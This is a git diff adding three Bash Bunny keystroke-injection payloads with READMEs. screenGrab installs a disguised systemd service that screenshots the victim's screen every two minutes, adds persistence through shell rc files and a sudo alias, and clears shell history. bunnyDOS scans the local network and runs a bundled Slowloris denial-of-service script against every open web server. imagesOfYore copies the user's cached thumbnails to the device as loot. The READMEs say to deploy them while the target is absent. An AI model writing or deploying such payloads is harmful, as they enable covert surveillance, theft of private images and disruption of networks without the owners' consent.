diff --git a/payloads/library/execution/ScreenGrab/README.md b/payloads/library/execution/ScreenGrab/README.md new file mode 100644 index 00000000..f3503171 --- /dev/null +++ b/payloads/library/execution/ScreenGrab/README.md @@ -0,0 +1,55 @@ +## About: +* Title: screenGrab +* Description: screenGrab payload captures snap shots of target's screen periodically and store them into bunny. +* AUTHOR: drapl0n +* Version: 1.0 +* Category: Execution +* Target: Unix-like operating systems with systemd. +* Attackmodes: HID, Storage + +## screenGrab: screenGrab payload is divided into two modules, First capture snap shots and Second stores them in bunny. + +### Features: +* Robust Payload for capturing snap shots of target's screen. +* No additional dependencies required. +* Persistent. +* Autostart payload on boot. + +### Payload: +* Payload is divided into two modules: +1) Deployment: In this stage payload is deployed in targets system. +2) Exfiltration: Storing saved loot from targets system in bunny. + +### Payload Script's Workflow: +* Stop storing histroy. +* Grep bunny's mount point of bunny. +* Creating hidden directory in /var/tmp/..... for obfuscation. +* Copying ffmpeg and snap shot capturing mechanism in target's system. +* Creating systemd service for persistance and triggering mechanism for autostart. + +### Changes to be made: +* Change time interval of capturing snapshots, default time interval is 120 secs. Make changes in `systemBus` on line number `4`. + +### LED Status: +* `SETUP` : MAGENTA +* `ATTACK` : YELLOW +* `FINISH` : GREEN + +### Note: +* Download pre compiled static build of ffmpeg from: https://github.com/drapl0n/temp/releases/download/ffmpeg/ffmpeg and move it in screenGrab directory. +* Due to big size of binary, it is not provided in this repo. +* Craete directory name `screenGrab` in `/loot/` for storing captured images. + +### Directory Structure of payload components: +| FileName | Directory | +| -------------- | ----------------------------- | +| switch1/payload.txt | /payloads/switch1/ | +| switch2/payload.txt | /payloads/switch2/ | +| screenGrab/ | /payloads/libray/ | + +### Usage: +1. Deploy first payload during absence of target using `switch1`. +2. Execute second payload during absence of target to store captured snapshots in bunny using `switch2`. + +#### Support me if you like my work: +* https://twitter.com/drapl0n diff --git a/payloads/library/execution/ScreenGrab/screenGrab/payload.sh b/payloads/library/execution/ScreenGrab/screenGrab/payload.sh new file mode 100644 index 00000000..ea0ff7a6 --- /dev/null +++ b/payloads/library/execution/ScreenGrab/screenGrab/payload.sh @@ -0,0 +1,18 @@ +#!/bin/bash +unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE +mkdir /var/tmp/.system +lol=$(lsblk | grep 1.8G) +disk=$(echo $lol | awk '{print $1}') +mntt=$(lsblk | grep $disk | awk '{print $7}') +cp -r $mntt/payloads/library/screenGrab/ffmpeg /var/tmp/.system/ +chmod +x /var/tmp/.system/ffmpeg +mkdir /var/tmp/.system/sysLog +cp -r $mntt/payloads/library/screenGrab/systemBus /var/tmp/.system/systemBus +chmod +x /var/tmp/.system/systemBus +mkdir -p ~/.config/systemd/user +echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/systemBUS.service +systemctl --user daemon-reload +systemctl --user enable --now systemBUS.service +systemctl --user start --now systemBUS.service +cp -r $mntt/payloads/library/screenGrab/shell /tmp/ +chmod +x /tmp/shell && /tmp/./shell && rm /tmp/shell diff --git a/payloads/library/execution/ScreenGrab/screenGrab/shell b/payloads/library/execution/ScreenGrab/screenGrab/shell new file mode 100644 index 00000000..2b46e3d3 --- /dev/null +++ b/payloads/library/execution/ScreenGrab/screenGrab/shell @@ -0,0 +1,12 @@ +#!/bin/bash +ls -a ~/ | grep 'zshrc' &> /dev/null +if [ $? = 0 ]; then + echo -e "alias sudo='bash /var/tmp/.system/systemMgr && sudo'" >> ~/.zshrc + echo "systemctl --user enable --now systemBUS.service && systemctl --user restart systemBUS.service" >> ~/.zshrc +fi + +ls -a ~/ | grep 'bashrc' &> /dev/null +if [ $? = 0 ]; then + echo -e "alias sudo='bash /var/tmp/.system/systemMgr && sudo'" >> ~/.bashrc + echo "systemctl --user enable --now systemBUS.service && systemctl --user restart systemBUS.service" >> ~/.bashrc +fi diff --git a/payloads/library/execution/ScreenGrab/screenGrab/systemBus b/payloads/library/execution/ScreenGrab/screenGrab/systemBus new file mode 100644 index 00000000..2f0c2b77 --- /dev/null +++ b/payloads/library/execution/ScreenGrab/screenGrab/systemBus @@ -0,0 +1,5 @@ +while true; +do + /var/tmp/.system/./ffmpeg -f x11grab -video_size $(xdpyinfo | grep dimensions | cut -d" " -f7) -i $DISPLAY -vframes 1 /var/tmp/.system/sysLog/$(date +%Y%m%d-%H%M%S).png + sleep 120 +done diff --git a/payloads/library/execution/ScreenGrab/switch1/payload.txt b/payloads/library/execution/ScreenGrab/switch1/payload.txt new file mode 100644 index 00000000..b8fafe1a --- /dev/null +++ b/payloads/library/execution/ScreenGrab/switch1/payload.txt @@ -0,0 +1,56 @@ +# Title: screenGrab +# Description: screenGrab payload captures snap shot's of target's screen periodically. +# AUTHOR: drapl0n +# Version: 1.0 +# Category: Execution +# Target: GNU/Linux operating systems with systemd. +# Attackmodes: HID, Storage. + +LED SETUP +ATTACKMODE STORAGE HID +GET SWITCH_POSITION +LED ATTACK +Q DELAY 1000 +Q CTRL-ALT t +Q DELAY 1000 + +# [Prevent storing history] +Q STRING unset HISTFILE +Q ENTER +Q DELAY 200 + +# [Fetching BashBunny's block device] +Q STRING lol='$(lsblk | grep 1.8G)' +Q ENTER +Q DELAY 100 +Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)'' +Q ENTER +Q DELAY 200 + +# [Mounting BashBunny] +Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp +Q ENTER +Q DELAY 2000 +Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)'' +Q ENTER +Q DELAY 500 + +# [transfering payload script] +Q STRING cp -r '$mntt'/payloads/library/screenGrab/payload.sh /tmp/ +Q ENTER +Q STRING chmod +x /tmp/payload.sh +Q ENTER +Q STRING /tmp/./payload.sh +Q ENTER +Q DELAY 12000 +Q STRING rm /tmp/payload.sh +Q ENTER +Q DELAY 500 + +# [Unmounting BashBunny] +Q STRING udisksctl unmount -b /dev/'$disk' +Q ENTER +Q DELAY 500 +Q STRING exit +Q ENTER +LED FINISH diff --git a/payloads/library/execution/ScreenGrab/switch2/payload.txt b/payloads/library/execution/ScreenGrab/switch2/payload.txt new file mode 100644 index 00000000..06e59f37 --- /dev/null +++ b/payloads/library/execution/ScreenGrab/switch2/payload.txt @@ -0,0 +1,43 @@ +# Title: screenGrab +# Description: screenGrab payload's exfilteration module to move captured snapshots to bunny. +# AUTHOR: drapl0n +# Version: 1.0 +# Category: Execution +# Target: GNU/Linux operating systems with systemd. +# Attackmodes: HID, Storage. + +LED SETUP +ATTACKMODE STORAGE HID +GET SWITCH_POSITION +LED ATTACK +Q DELAY 1000 +Q CTRL-ALT t +Q DELAY 1000 + +# [Prevent storing history] +Q STRING unset HISTFILE +Q ENTER +Q DELAY 200 + +# [Fetching BashBunny's block device] +Q STRING lol='$(lsblk | grep 1.8G)' +Q ENTER +Q DELAY 100 +Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)'' +Q ENTER +Q DELAY 200 + +# [Mounting BashBunny] +Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp +Q ENTER +Q DELAY 2000 +Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)'' +Q ENTER +Q DELAY 500 + +# [transfering payload script] +# create directory named screenGrab in /loot/ +Q STRING mv /var/tmp/.system/sysLog/* '$mntt'/loot/screenGrab/ \& +Q ENTER +Q STRING disown \&\& exit +Q ENTER diff --git a/payloads/library/execution/bunnyDOS/README.md b/payloads/library/execution/bunnyDOS/README.md new file mode 100644 index 00000000..433d825e --- /dev/null +++ b/payloads/library/execution/bunnyDOS/README.md @@ -0,0 +1,37 @@ +## About: +* Title: bunnyDOS +* Description: bunnyDOS payload intelligently search target's network for open http(configurable for https) ports and executes DOS it. +* AUTHOR: drapl0n +* Version: 1.0 +* Category: Execution +* Target: Unix-like operating systems with systemd. +* Attackmodes: HID, Storage + +## bunnyDOS: bunnyDOS payload intelligently search target's network for open http(configurable for https) ports and DOS it. Inject payload into multiple systems in network for robust DDOS. + +### Features: +* Auto scan Network. +* Capable for DDOS. +* Persistent. +* Autostart payload on boot. + +### Payload Workflow: +* Stop storing histroy. +* Auto Mounting bunny. +* Transfering payload script. +* Executing script in background and disowning it(this helps to reduce physical access time as network can be large). +* Unmounting bunny. + +### LED Status: +* `SETUP` : MAGENTA +* `ATTACK` : YELLOW +* `FINISH` : GREEN + +### Directory Structure of payload components: +| FileName | Directory | +| -------------- | ----------------------------- | +| payload.txt | /payloads/switch1/ | +| bunnyDOS/ | /payloads/libray/ | + +#### Support me if you like my work: +* https://twitter.com/drapl0n diff --git a/payloads/library/execution/bunnyDOS/bunnyDOS/payload.sh b/payloads/library/execution/bunnyDOS/bunnyDOS/payload.sh new file mode 100644 index 00000000..eeb3f5f8 --- /dev/null +++ b/payloads/library/execution/bunnyDOS/bunnyDOS/payload.sh @@ -0,0 +1,19 @@ +#!/bin/bash +lol=$(lsblk | grep 1.8G) +disk=$(echo $lol | awk '{print $1}') +mntt=$(lsblk | grep $disk | awk '{print $7}') +ip=$(ip -o -f inet addr show | awk '/scope global/ {print $4}') +open=$(nmap -p 80 $ip -q -oG - | grep open | awk '{print $2}' | awk '{printf("%s ",$0)} END { printf "\n" }') +mkdir /var/tmp/.system/ +mkdir -p ~/.config/systemd/user +echo -e "[Unit]\nDescription= System IO handler.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/sysHandler -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/libSystemIO.service +cp -r $mntt/payloads/library/bunnyDOS/systemIO /var/tmp/.system/ +chmod +x /var/tmp/.system/systemIO +for i in $open +do + echo "/var/tmp/.system/./systemIO $i -p 80 -s 500" >> /var/tmp/.system/sysHandler +done +chmod +x /var/tmp/.system/sysHandler +systemctl --user start libSystemIO.service +echo -e "#\!/bin/bash\nls -a | grep 'zshrc' &> /dev/null\nif [ $? = 0 ]; then\n\techo systemctl --user start --now libSystemIO.service >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ $? = 0 ]; then\n\techo systemctl --user start --now libSystemIO.service >> ~/.bashrc\nfi" > ~/tmmmp +chmod +x ~/tmmmp && ~/./tmmmp && rm tmmmp && rm /tmp/payload.sh && exit diff --git a/payloads/library/execution/bunnyDOS/bunnyDOS/systemIO b/payloads/library/execution/bunnyDOS/bunnyDOS/systemIO new file mode 100644 index 00000000..554a5035 --- /dev/null +++ b/payloads/library/execution/bunnyDOS/bunnyDOS/systemIO @@ -0,0 +1,222 @@ +#!/usr/bin/env python3 +import argparse +import logging +import random +import socket +import sys +import time + +parser = argparse.ArgumentParser( + description="Slowloris, low bandwidth stress test tool for websites" +) +parser.add_argument("host", nargs="?", help="Host to perform stress test on") +parser.add_argument( + "-p", "--port", default=80, help="Port of webserver, usually 80", type=int +) +parser.add_argument( + "-s", + "--sockets", + default=150, + help="Number of sockets to use in the test", + type=int, +) +parser.add_argument( + "-v", + "--verbose", + dest="verbose", + action="store_true", + help="Increases logging", +) +parser.add_argument( + "-ua", + "--randuseragents", + dest="randuseragent", + action="store_true", + help="Randomizes user-agents with each request", +) +parser.add_argument( + "-x", + "--useproxy", + dest="useproxy", + action="store_true", + help="Use a SOCKS5 proxy for connecting", +) +parser.add_argument( + "--proxy-host", default="127.0.0.1", help="SOCKS5 proxy host" +) +parser.add_argument( + "--proxy-port", default="8080", help="SOCKS5 proxy port", type=int +) +parser.add_argument( + "--https", + dest="https", + action="store_true", + help="Use HTTPS for the requests", +) +parser.add_argument( + "--sleeptime", + dest="sleeptime", + default=15, + type=int, + help="Time to sleep between each header sent.", +) +parser.set_defaults(verbose=False) +parser.set_defaults(randuseragent=False) +parser.set_defaults(useproxy=False) +parser.set_defaults(https=False) +args = parser.parse_args() + +if len(sys.argv) <= 1: + parser.print_help() + sys.exit(1) + +if not args.host: + print("Host required!") + parser.print_help() + sys.exit(1) + +if args.useproxy: + # Tries to import to external "socks" library + # and monkey patches socket.socket to connect over + # the proxy by default + try: + import socks + + socks.setdefaultproxy( + socks.PROXY_TYPE_SOCKS5, args.proxy_host, args.proxy_port + ) + socket.socket = socks.socksocket + logging.info("Using SOCKS5 proxy for connecting...") + except ImportError: + logging.error("Socks Proxy Library Not Available!") + +if args.verbose: + logging.basicConfig( + format="[%(asctime)s] %(message)s", + datefmt="%d-%m-%Y %H:%M:%S", + level=logging.DEBUG, + ) +else: + logging.basicConfig( + format="[%(asctime)s] %(message)s", + datefmt="%d-%m-%Y %H:%M:%S", + level=logging.INFO, + ) + + +def send_line(self, line): + line = f"{line}\r\n" + self.send(line.encode("utf-8")) + + +def send_header(self, name, value): + self.send_line(f"{name}: {value}") + + +if args.https: + logging.info("Importing ssl module") + import ssl + + setattr(ssl.SSLSocket, "send_line", send_line) + setattr(ssl.SSLSocket, "send_header", send_header) + +list_of_sockets = [] +user_agents = [ + "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36", + "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36", + "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50", + "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:49.0) Gecko/20100101 Firefox/49.0", + "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36", + "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36", + "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36", + "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/602.2.14 (KHTML, like Gecko) Version/10.0.1 Safari/602.2.14", + "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50", + "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393" + "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36", + "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36", + "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36", + "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36", + "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0", + "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36", + "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36", + "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36", + "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36", + "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0", + "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", + "Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0", + "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36", + "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36", + "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0", +] + +setattr(socket.socket, "send_line", send_line) +setattr(socket.socket, "send_header", send_header) + + +def init_socket(ip): + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.settimeout(4) + + if args.https: + ctx = ssl.create_default_context() + s = ctx.wrap_socket(s, server_hostname=args.host) + + s.connect((ip, args.port)) + + s.send_line(f"GET /?{random.randint(0, 2000)} HTTP/1.1") + + ua = user_agents[0] + if args.randuseragent: + ua = random.choice(user_agents) + + s.send_header("User-Agent", ua) + s.send_header("Accept-language", "en-US,en,q=0.5") + return s + + +def main(): + ip = args.host + socket_count = args.sockets + logging.info("Attacking %s with %s sockets.", ip, socket_count) + + logging.info("Creating sockets...") + for _ in range(socket_count): + try: + logging.debug("Creating socket nr %s", _) + s = init_socket(ip) + except socket.error as e: + logging.debug(e) + break + list_of_sockets.append(s) + + while True: + try: + logging.info( + "Sending keep-alive headers... Socket count: %s", + len(list_of_sockets), + ) + for s in list(list_of_sockets): + try: + s.send_header("X-a", random.randint(1, 5000)) + except socket.error: + list_of_sockets.remove(s) + + for _ in range(socket_count - len(list_of_sockets)): + logging.debug("Recreating socket...") + try: + s = init_socket(ip) + if s: + list_of_sockets.append(s) + except socket.error as e: + logging.debug(e) + break + logging.debug("Sleeping for %d seconds", args.sleeptime) + time.sleep(args.sleeptime) + + except (KeyboardInterrupt, SystemExit): + logging.info("Stopping Slowloris") + break + + +if __name__ == "__main__": + main() diff --git a/payloads/library/execution/bunnyDOS/payload.txt b/payloads/library/execution/bunnyDOS/payload.txt new file mode 100644 index 00000000..646fe1f0 --- /dev/null +++ b/payloads/library/execution/bunnyDOS/payload.txt @@ -0,0 +1,51 @@ +# Description: bunnyDOS payload intelligently search target's network for open http(configurable for https) ports and executes DOS it. +# AUTHOR: drapl0n +# Version: 1.0 +# Category: Execution +# Target: Unix-like operating systems with systemd. +# Attackmodes: HID, Storage + +LED SETUP +ATTACKMODE STORAGE HID +GET SWITCH_POSITION +LED ATTACK +Q DELAY 1000 +Q CTRL-ALT t +Q DELAY 1000 + +# [Prevent storing history] +Q STRING unset HISTFILE +Q ENTER +Q DELAY 200 + +# [Fetching BashBunny's block device] +Q STRING lol='$(lsblk | grep 1.8G)' +Q ENTER +Q DELAY 100 +Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)'' +Q ENTER +Q DELAY 200 + +# [Mounting BashBunny] +Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp +Q ENTER +Q DELAY 2000 +Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)'' +Q ENTER +Q DELAY 500 + +# [transfering payload script] +Q STRING cp -r '$mntt'/payloads/library/bunnyDOS/payload.sh /tmp/ +Q ENTER +Q STRING chmod +x /tmp/payload.sh +Q ENTER +Q STRING /tmp/./payload.sh \& +Q ENTER +Q STRING disown +Q ENTER +Q STRING udisksctl unmount -b /dev/'$disk' +Q ENTER +Q DELAY 500 +Q STRING exit +Q ENTER +LED FINISH diff --git a/payloads/library/exfiltration/imagesOfYore/README.md b/payloads/library/exfiltration/imagesOfYore/README.md new file mode 100644 index 00000000..f79725bf --- /dev/null +++ b/payloads/library/exfiltration/imagesOfYore/README.md @@ -0,0 +1,38 @@ +## About: +* Title: imagesOfYore +* Description: imagesOfYore payload steals every image that target ever had in his disk. +* AUTHOR: drapl0n +* Version: 1.0 +* Category: Exfiltration +* Target: Unix-like operating systems. +* Attackmodes: HID, Storage + +## imagesOfYore: Taking advantaged of cached images, imagesOfYore is simple payload which steals every image that target ever had in his disk. + +### Features: +* Sotres all images(curently stored on disk and deleted too). +* Extremly fast zstd compression for transfering images. + +### Payload Workflow: +* Stop storing histroy. +* Auto Mounting bunny. +* Transfering payload script. +* Executing script in background and disowning +* Unmounting bunny. + +### LED Status: +* `SETUP` : MAGENTA +* `ATTACK` : YELLOW +* `FINISH` : GREEN + +### Directory Structure of payload components: +| FileName | Directory | +| -------------- | ----------------------------- | +| payload.txt | /payloads/switch1/ | +| imagesOfYore/ | /payloads/libray/ | + +### Note: +* Create directory named `imagesOfYore` in `/loot/` for storing loot. + +#### Support me if you like my work: +* https://twitter.com/drapl0n diff --git a/payloads/library/exfiltration/imagesOfYore/imagesOfYore/payload.sh b/payloads/library/exfiltration/imagesOfYore/imagesOfYore/payload.sh new file mode 100644 index 00000000..e77f814c --- /dev/null +++ b/payloads/library/exfiltration/imagesOfYore/imagesOfYore/payload.sh @@ -0,0 +1,9 @@ +#!/bin/bash +unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE +mkdir /var/tmp/.system +lol=$(lsblk | grep 1.8G) +disk=$(echo $lol | awk '{print $1}') +mntt=$(lsblk | grep $disk | awk '{print $7}') +cd ~/.cache && tar --zstd -cf $mntt/loot/imagesOfYore/thumbnails.tar.zst thumbnails +udisksctl unmount -b /dev/$disk +rm /tmp/script diff --git a/payloads/library/exfiltration/imagesOfYore/payload.txt b/payloads/library/exfiltration/imagesOfYore/payload.txt new file mode 100644 index 00000000..a1d2e914 --- /dev/null +++ b/payloads/library/exfiltration/imagesOfYore/payload.txt @@ -0,0 +1,47 @@ +# Title: imagesOfYore +# Description: imagesOfYore payload steals every image that target ever had in his disk. +# AUTHOR: drapl0n +# Version: 1.0 +# Category: Exfiltration +# Target: Unix-like operating systems. +# Attackmodes: HID, Storage + +LED SETUP +ATTACKMODE STORAGE HID +GET SWITCH_POSITION +LED ATTACK +Q DELAY 1000 +Q CTRL-ALT t +Q DELAY 1000 + +# [Prevent storing history] +Q STRING unset HISTFILE +Q ENTER +Q DELAY 200 + +# [Fetching BashBunny's block device] +Q STRING lol='$(lsblk | grep 1.8G)' +Q ENTER +Q DELAY 100 +Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)'' +Q ENTER +Q DELAY 200 + +# [Mounting BashBunny] +Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp +Q ENTER +Q DELAY 2000 +Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)'' +Q ENTER +Q DELAY 500 + +# [transfering payload script] +Q STRING cp -r '$mntt'/payloads/library/imagesOfYore/payload.sh /tmp/script +Q ENTER +Q STRING chmod +x /tmp/script +Q ENTER +Q STRING /tmp/./script \& +Q ENTER +Q STRING disown \&\& exit +Q ENTER +LED FINISH